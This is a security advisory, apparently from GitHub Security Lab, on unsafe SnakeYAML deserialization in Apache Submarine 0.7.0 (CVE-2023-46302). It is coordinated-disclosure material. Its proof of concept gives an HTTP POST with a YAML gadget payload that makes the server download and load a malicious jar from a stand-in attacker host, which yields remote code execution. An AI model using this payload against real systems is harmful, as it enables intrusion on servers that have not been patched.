skip to content
Back to
Home Bounties Research Advisories CodeQL Wall of Fame Get Involved Events
April 3, 2024

GHSL-2023-015: Unsafe deserialization in Apache Submarine - CVE-2023-46302

Jorge Rosillo

Coordinated Disclosure Timeline


Apache Submarine is vulnerable to unsafe deserialization due to the use of SnakeYaml’s default constructor when parsing user-supplied data.



Tested Version

version 0.7.0


Issue: Unsafe deserialization via SnakeYaml in YamlEntityProvider (GHSL-2023-015)

Apache Submarine uses JAXRS to define REST endpoints. In order to handle YAML requests (using application/yaml content-type), it defines a YamlEntityProvider entity provider that will process all incoming YAML requests. In order to unmarshal the request, the readFrom method is invoked, passing the entityStream containing the user-supplied data to Yaml.loadAs:

  public T readFrom(Class<T> type, Type genericType, Annotation[] annotations,
      MediaType mediaType,
      MultivaluedMap<String, String> httpHeaders, InputStream entityStream)
      throws WebApplicationException {
    Yaml yaml = new Yaml();
    T t = yaml.loadAs(toString(entityStream), type);
    return t;

Even though yaml.loadAs enforces that the provided type matches the type of the yaml data of the request, this check is only done for the overall object, so providing a subtype like the following would be accepted as valid and deserialized:

    modelName: !!javax.script.ScriptEngineManager [!! [[!! ["https://attacker/yaml-payload.jar"]]]]

Proof of Concept

In order to exploit this deserialization vulnerability, we can instantiate a javax.script.ScriptEngineManager object with a URLClassLoader argument, which will trigger the constructor. The provided URL points to an attacker-controller server hosting a malicious jar which will execute a command.

POST /api/v1/serve/ HTTP/1.1
Content-Type: application/yaml
Content-Length: 205

    modelName: !!javax.script.ScriptEngineManager [!! [[!! ["https://attacker/yaml-payload.jar"]]]]

Using artsploit/yaml-payload project, we can build the payload, which, when served, can be fetched by the deserialization of the yaml payload.


This issue may lead to Remote Code Execution



This issue was discovered and reported by GHSL team member @jorgectf (Jorge Rosillo).


You can contact the GHSL team at, please include a reference to GHSL-2023-015 in any communication regarding this issue.